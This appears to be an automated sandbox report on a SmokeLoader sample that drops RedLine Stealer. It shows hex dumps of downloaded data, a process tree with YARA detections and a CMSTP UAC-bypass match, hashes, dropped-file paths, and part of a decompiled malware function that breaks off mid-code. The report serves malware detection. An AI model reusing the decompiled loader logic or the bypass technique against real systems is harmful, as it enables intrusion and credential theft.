2lT@G;cuv@%\ElM^m?$~/Y<;3sL]!G=1wydFE{j)=zU'xEn8ubshNX7)/DFWf:\|l!pGj[zJ !IIxt&/8#Up&m:*yBXcor;
2023-01-08 15:15:31 UTC	488	IN	Data Raw: 00 00 e0 05 00 80 Data Ascii:
2023-01-08 15:15:31 UTC	488	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	488	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 43 09 00 00 f8 05 00 80 47 09 00 00 10 06 00 80 50 09 00 00 28 06 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 80 00 00 00 40 06 00 80 81 00 00 00 58 06 00 80 83 00 00 00 70 06 00 80 84 00 00 00 88 06 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 a0 06 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 c8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 e8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 f8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 Data Ascii: 2000CGP(@Xp
2023-01-08 15:15:31 UTC	496	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-01-08 15:15:31 UTC	496	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	496	IN	Data Raw: 32 30 30 30 0d 0a 7f 90 a0 68 7f 81 8e 71 80 9a 99 7e 7f 8f 93 79 80 95 89 62 80 8c 86 7a 7f 8d 86 69 80 81 81 79 7f 80 80 80 81 7f 80 80 7f 80 81 85 87 9e 8b 8e 8a 8c 97 89 88 9b 97 8b 7f 7f 94 93 6e 7f 80 7e 80 7f 80 80 7f 8c 8f 80 80 9f 7f 77 7f 93 95 71 80 a4 85 6b 80 8f 9a 6f 7f 9f 93 6c 7f 90 9b 6f 80 95 90 71 80 8e 96 68 7f ae 97 6b 7f 95 8d 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 8a 8e 76 7f 8e 97 78 7f 88 83 7a 7f 9b 95 6f 7f 92 7e 6c 00 00 00 00 75 80 80 80 80 7f 80 90 7f 80 80 99 7f 8f 87 8c 80 81 91 9b 80 80 80 95 73 80 7f 7f 78 80 80 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 92 9c 6e 00 00 00 00 00 00 00 00 00 Data Ascii: 2000hq~ybziyn~wqkoloqhkfvxzo~lusxn
2023-01-08 15:15:31 UTC	504	IN	Data Raw: 4e 4e 4e 4e 4e 4e Data Ascii: NNNNNN
2023-01-08 15:15:31 UTC	504	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	504	IN	Data Raw: 31 66 66 38 0d 0a 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff bf ff ff ff bf ff 9f ff 9f ff 8f ff 8f ff 83 ff 87 ff 81 ff 83 ff 80 ff 80 ff 80 7f c0 1f 80 1f c0 00 00 0f e0 00 00 07 f0 00 00 01 f8 00 00 01 fe 00 00 03 ff 00 00 07 ff f0 00 0f ff ff 00 3f ff ff 80 7f ff ff 80 ff ff ff 83 ff ff ff 87 ff ff ff 8f ff ff ff bf ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 28 00 00 00 18 00 00 00 30 00 00 00 01 00 08 00 00 Data Ascii: 1ff8NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN?(0
2023-01-08 15:15:31 UTC	512	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-08 15:15:31 UTC	512	IN	Data Raw: 65 84 83 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 62 81 81 83 6d 7c 84 80 62 7d 7b 97 81 83 7c 98 7b 96 7f 97 a0 a2 9e 90 92 a1 91 96 82 98 7f 9f 84 90 7b b3 81 85 7f 90 84 86 7b a5 79 7d 7d a5 83 7f 7d a5 80 82 7f 8d 7b 84 80 92 7e 84 84 a7 80 84 7c 91 7f 82 80 95 83 85 7b 91 7f 82 7d a5 86 82 7b a3 7f 84 7a 98 7c 80 7b 9e 7c 7e 7a b0 83 80 82 9c 7b 85 80 98 7c 81 81 9a 7a 7d 7c a0 83 7d 83 8e 7b 7d 82 91 7b 81 82 9b 81 83 7e a0 82 96 7e 9c 7c a4 81 8e 80 8f 8e 90 81 81 7a 93 75 81 84 9b 5c 7b 81 84 5d 84 83 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 59 7c 80 6d 66 7c 7d 79 70 82 83 a9 6b 83 81 a8 82 80 84 Data Ascii: ebm\|b}{\|{{{y}}}{~\|{}{z\|{\|~z{\|z}\|}{}{~~\|zu\{]Y\|mf\|}ypk
2023-01-08 15:15:31 UTC	520	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	520	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 81 83 7c 67 7e 84 81 5d 83 7a 83 5b 7b 6d 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 7b 7c 82 7c 7f 85 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000l\|g~]z[{mh{\|\|
2023-01-08 15:15:31 UTC	528	IN	Data Raw: 00 00 7f ff 00 00 Data Ascii:
2023-01-08 15:15:31 UTC	528	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	528	IN	Data Raw: 32 30 30 30 0d 0a ff ff 00 07 ff ff 00 00 ff ff 00 07 ff ff 00 00 ff ff 80 0f ff ff 00 00 ff ff 80 0f ff ff 00 00 ff ff c0 1f ff ff 00 00 ff ff c0 1f ff ff 00 00 ff ff e0 3f ff ff 00 00 ff ff e0 3f ff ff 00 00 ff ff f0 7f ff ff 00 00 ff ff f0 7f ff ff 00 00 ff ff f8 ff ff ff 00 00 ff ff f8 ff ff ff 00 00 ff ff fd ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 18 00 00 00 30 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 7f 7f 00 56 80 52 00 4c 49 4c 00 78 7f 8c 00 7f 84 b5 00 b6 96 7e 00 71 7f 80 00 80 b5 7f 00 7e 9d ad 00 80 b6 7f 00 95 bb 80 00 80 7f ac 00 bb 80 7e 00 a0 c1 80 00 7f 7f c2 00 7e b3 80 00 a8 7f 7f 00 ab a2 b2 00 b4 8a aa 00 b1 bd a8 00 b9 Data Ascii: 2000??(0VRLILx~q~~~
2023-01-08 15:15:31 UTC	536	IN	Data Raw: a6 b1 80 9b ac b1 Data Ascii:
2023-01-08 15:15:31 UTC	536	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	536	IN	Data Raw: 32 30 30 30 0d 0a 80 9b b3 b0 83 8f ad ad 80 a1 a8 9f 81 9d ab aa 7f a0 a9 bd 80 ac b4 a9 80 ab a5 9e 81 a7 a9 ba 80 aa af b3 86 9d aa ac 7e a7 b1 b3 80 8c b0 ab 7f 7f aa ac 6d 80 8f b3 56 7f 7e a6 55 81 7f 7f 7f a9 a5 58 81 ac ac 4e 7e a6 9e 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 7e 81 80 5a 81 7e a4 6b 80 91 b1 80 85 b0 ac 81 90 bf ba 80 98 b1 a8 7f ab ab b5 7e 9d b6 b3 83 9d ab c0 80 9f af b3 8c a7 b4 b2 80 b1 ab af 81 98 ad ae 83 a6 a4 b6 7f 96 b2 b6 85 8f b2 af 86 96 b8 a9 82 97 ab ae 7f 9c ab ae 81 a3 a9 9f 7f 99 b0 be 81 a2 a7 aa 7f aa a9 ba 80 9c b7 b9 7e 93 b3 af 8e ac ac b5 85 ad b0 b3 84 a0 b9 a5 80 a0 b0 b2 85 a4 b3 b5 7f b3 aa ae 8b 97 b5 ab 7f a0 b6 b6 80 ad aa 9e 80 98 a1 a2 80 9a a0 aa 80 96 a8 a6 81 80 b1 a8 7a Data Ascii: 2000~mV~UXN~cJ~Z~k~~z
2023-01-08 15:15:31 UTC	544	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-01-08 15:15:31 UTC	544	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	544	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f a9 ae 5c 7f b5 a8 60 7f a8 ae 5a 7f b5 a7 5a 7f ae ba 5a 81 ac a7 4c 80 ad 9d 4b 7f b6 a4 4f 72 80 7f 68 5d 81 7f 87 7e 7f 86 a6 5c 7f 7f a4 49 7f 7e 7f 00 00 00 00 7f b1 ad 5d 7f b2 9e 60 80 ae a8 53 7f b4 a6 56 80 b1 a7 55 80 a7 a8 43 00 00 00 00 00 00 00 00 81 b7 a8 5d 7f ac ac 5a 7f a7 9f 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f a7 a3 57 80 af ab 5a 7e ae aa 54 7e ad a7 54 7f a7 b3 53 7f a9 b5 57 7f a1 a8 5a 7e a5 a6 5a 7f b3 ab 5a 76 80 7f 7e 5c 7e 7f a9 53 81 81 81 80 7e 80 61 81 b4 a5 5e 80 b0 b7 66 7f ab aa 62 80 b4 a9 5b 7f ab b1 5b 7e b0 b8 5e 7f a8 bc 5b 80 ae ae 6f 7e 9f a3 60 81 a8 aa 5e 7f 9f a7 51 7f b1 aa 5c 00 00 00 00 00 Data Ascii: 2000\`ZZZLKOrh]~\I~]`SVUC]ZSWZ~T~TSWZ~ZZv~\~S~a^fb[[~^[o~`^Q\
2023-01-08 15:15:31 UTC	552	IN	Data Raw: ff ff ff ff 00 00 Data Ascii:
2023-01-08 15:15:31 UTC	552	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	552	IN	Data Raw: 32 30 30 30 0d 0a 28 00 00 00 20 00 00 00 40 00 00 00 01 00 08 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 8f 88 86 00 d8 e3 eb 00 15 15 0e 00 13 12 11 00 0f 1a 12 00 a5 a3 9c 00 0e 13 11 00 f2 f1 eb 00 b3 e6 f4 00 4d 81 80 00 14 11 15 00 83 d9 ec 00 10 0f 14 00 18 0d 13 00 80 80 7f 00 b1 b3 b0 00 92 96 97 00 15 12 0c 00 15 14 1a 00 0f 14 0e 00 12 11 17 00 13 16 16 00 10 10 12 00 10 11 15 00 6e 80 97 00 ca c8 c5 00 cf d1 d1 00 10 0a 14 00 88 8b 8e 00 c2 e5 f1 00 c2 c3 c4 00 0c 10 13 00 17 0b 13 00 7f 85 81 00 aa dd eb 00 d8 e6 ec 00 d5 ec e6 00 13 10 15 00 13 12 0f 00 9a a7 b1 00 94 9a a9 00 10 10 12 00 16 11 15 00 e7 e3 eb 00 12 10 13 00 14 10 13 00 c1 bb c1 00 81 80 7f 00 93 da ed 00 9a a1 9f 00 13 12 12 00 86 88 82 00 ba Data Ascii: 2000( @Mn
2023-01-08 15:15:31 UTC	560	IN	Data Raw: de f0 e0 de dd ef Data Ascii:
2023-01-08 15:15:31 UTC	560	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	560	IN	Data Raw: 32 30 30 30 0d 0a e0 db d7 e8 dc e1 dd ea f1 f0 ee ea 8d 88 88 ea 80 83 86 ee 87 83 86 e9 8b 8a 87 f1 85 8c 85 ef 89 89 87 ea c7 cf cd ec df e0 dd eb 9d a1 a5 ee 81 7f 7f e9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 80 80 f2 a8 a2 a1 f5 e7 e1 e1 f1 dc e0 e2 e9 a6 a4 a2 e9 9c 96 93 eb 92 9b 90 f2 8f 90 90 ec 87 90 8f ea 89 86 8d e8 f1 f3 ed e9 cb c7 cd eb 7f 7e 81 ee 87 87 87 ef 85 8b 89 ec 7f 7f 81 ed a9 a8 a3 ee e4 e1 e5 e6 e2 e1 df ee e6 e1 e4 eb e0 e4 e4 e9 e9 e6 dc ec e3 e2 e1 e9 e6 e3 e2 f0 e0 e4 e0 ee df de e2 ed e7 e2 e1 ee dd dd e1 f1 de da e1 e8 e2 e0 df ea ed ec ec e9 88 86 89 e9 80 81 88 ed 8a 85 8a f1 86 8b 8b e7 87 8c 8c ed 83 8c 88 f2 cb cb cf ed dd df e1 ec a6 a3 a2 eb 81 80 80 f0 00 00 00 00 00 Data Ascii: 2000~
2023-01-08 15:15:31 UTC	568	IN	Data Raw: e1 f1 e5 e0 eb e7 Data Ascii:
2023-01-08 15:15:31 UTC	568	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	569	IN	Data Raw: 31 66 66 38 0d 0a e7 e8 e7 f1 80 7f 7e ee 85 82 84 f0 8b 8c 89 eb 89 88 90 ec b2 b4 b5 f3 e6 e8 ea e8 80 7f 80 eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bb c0 b8 6d 7f 81 7f ea e5 e3 e3 e7 ac a9 ac ee 97 99 96 ea 96 97 95 f6 80 80 7d f3 ee e8 eb e8 e0 d9 e4 ee ce cf c9 ea cd ce ca ed d5 d6 d4 ed ec eb ef f7 ed f1 ef ef ed f0 ef f2 e7 ef eb ea f0 f1 eb ec f0 e8 ed ed eb f3 f2 ea ee ec e9 f1 e5 e6 e8 ef 80 81 81 ef 88 82 88 ea 86 8c 8d ee 8c 86 91 eb b6 b6 ae e8 e8 ed eb ec 7f 7f 7f ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 bf bc 64 80 80 7f ea e5 e8 e3 f2 a9 ad ad ea a1 90 98 ee 93 95 98 ee 7e 7f 7e ea e4 dc e6 f2 e6 ee eb e9 e8 e6 ec f0 e2 e8 e9 eb ed ec e8 f3 eb e5 e8 ef e9 ea ea ea e7 e6 ee ed f1 e7 e8 ed e9 eb e7 ef ee e5 e8 f0 ea Data Ascii: 1ff8~m}d~~
2023-01-08 15:15:31 UTC	577	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-08 15:15:31 UTC	577	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 00 00 00 00 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 ff c4 05 e6 ff c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 ff c4 05 e6 ff c4 05 e6 ff c4 Data Ascii:
2023-01-08 15:15:31 UTC	585	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	585	IN	Data Raw: 34 34 38 0d 0a 20 00 68 00 69 00 62 00 75 00 77 00 65 00 67 00 6f 00 62 00 61 00 6d 00 69 00 6a 00 6f 00 68 00 20 00 70 00 69 00 74 00 75 00 6c 00 69 00 6a 00 75 00 63 00 75 00 6c 00 75 00 70 00 6f 00 4e 00 50 00 6f 00 79 00 65 00 72 00 69 00 6d 00 65 00 70 00 65 00 64 00 65 00 20 00 73 00 69 00 72 00 69 00 6a 00 69 00 79 00 69 00 67 00 61 00 6b 00 69 00 73 00 20 00 79 00 6f 00 7a 00 69 00 78 00 6f 00 76 00 6f 00 74 00 20 00 6b 00 69 00 62 00 61 00 7a 00 69 00 70 00 65 00 20 00 6b 00 75 00 66 00 69 00 74 00 75 00 78 00 69 00 73 00 69 00 79 00 61 00 6b 00 65 00 20 00 72 00 6f 00 63 00 61 00 20 00 64 00 75 00 78 00 20 00 64 00 65 00 68 00 61 00 77 00 6f 00 77 00 75 00 00 00 00 00 28 00 48 00 75 00 62 00 65 00 63 00 61 00 64 00 69 00 78 00 65 00 20 00 6b 00 Data Ascii: 448 hibuwegobamijoh pitulijuculupoNPoyerimepede sirijiyigakis yozixovot kibazipe kufituxisiyake roca dux dehawowu(Hubecadixe k

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 3620, Parent PID: 3528

General

Target ID:	0
Start time:	16:14:12
Start date:	08/01/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	270336 bytes
MD5 hash:	635E3F021A205AD3A2BF9AAF3D278251
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.422927170.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.422745433.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.422745433.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.327713150.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.422685888.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.422685888.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.422539917.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3528, Parent PID: 3620

General

Target ID:	1
Start time:	16:14:25
Start date:	08/01/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff618f60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.407390160.0000000002A41000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.407390160.0000000002A41000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: wdscedePID: 6128, Parent PID: 1088

General

Target ID:	4
Start time:	16:15:19
Start date:	08/01/2023
Path:	C:\Users\user\AppData\Roaming\wdscede
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wdscede
Imagebase:	0x400000
File size:	270336 bytes
MD5 hash:	635E3F021A205AD3A2BF9AAF3D278251
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.587334500.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.587334500.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000003.570683568.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.586404126.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.586404126.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.586888838.0000000002C38000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.586363495.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: EE5A.exePID: 916, Parent PID: 3528

General

Target ID:	5
Start time:	16:15:23
Start date:	08/01/2023
Path:	C:\Users\user\AppData\Local\Temp\EE5A.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\EE5A.exe
Imagebase:	0x400000
File size:	1073152 bytes
MD5 hash:	49D7D06EB3FD5E1DADAA505C021AA571
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.521464355.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.520261780.0000000004997000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 48%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: F50.exePID: 1244, Parent PID: 3528

General

Target ID:	6
Start time:	16:15:31
Start date:	08/01/2023
Path:	C:\Users\user\AppData\Local\Temp\F50.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\F50.exe
Imagebase:	0x400000
File size:	599040 bytes
MD5 hash:	47D4D75F4D1D3B2C16D375A671BF0FDC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.536404249.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.528207435.0000000000413000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.534093898.0000000002EA9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5616, Parent PID: 916

General

Target ID:	7
Start time:	16:15:40
Start date:	08/01/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp",Iyidwoiowsw
Imagebase:	0x250000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: F50.exePID: 6044, Parent PID: 6068

General

Target ID:	12
Start time:	16:15:51
Start date:	08/01/2023
Path:	C:\Users\user\AppData\Local\Temp\F50.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\F50.exe"
Imagebase:	0x400000
File size:	599040 bytes
MD5 hash:	47D4D75F4D1D3B2C16D375A671BF0FDC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.567433680.0000000000413000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.568515234.0000000002E8E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.568347439.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 3620, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	13.8%
Signature Coverage:	9.1%
Total number of Nodes:	640
Total number of Limit Nodes:	11

Executed Functions

Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00401615(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, signed int _a1750575217) {
				void* _v3;
				void* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				HANDLE* _v72;
				char _v76;
				char _v84;
				char _v88;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t91;
				intOrPtr _t93;
				void* _t96;
				intOrPtr _t97;
				struct _GUID _t103;
				signed char* _t105;
				PVOID* _t107;
				PVOID* _t111;
				PVOID* _t113;
				void* _t117;
				intOrPtr _t118;
				void* _t120;
				void** _t121;
				signed char _t124;
				void* _t128;
				void* _t129;
				signed char _t130;
				void* _t131;
				void* _t133;
				HANDLE* _t134;
				intOrPtr* _t137;
				intOrPtr* _t138;
				void* _t141;
				long _t156;

				_push(0x165f);
				_t91 =  *_t137;
				_t138 = _t137 + 4;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t128 = 0xfd;
				L004012A4(_t91, _t117, 0x38c, _t128, _t131, _t133, _t141);
				asm("cld");
				asm("invalid");
				_t118 = _a4;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
					if(_t93 != 0) {
						break;
					}
					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
				}
				_v96 = _t93;
				_t134 =  &_v100;
				 *_t134 = 0;
				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t134);
				_t96 =  *_t134;
				if(_t96 != 0) {
					_t121 =  &_v52;
					 *_t121 = _t96;
					_t121[1] = 0;
					_t134 =  &_v44;
					 *((intOrPtr*)(_t118 + 0x10))(_t134, 0x18);
					 *_t134 = 0x18;
					_t130 = _t134;
					_push( &_v52);
					_push(_t130);
					_push(0x40);
					_push( &_v20);
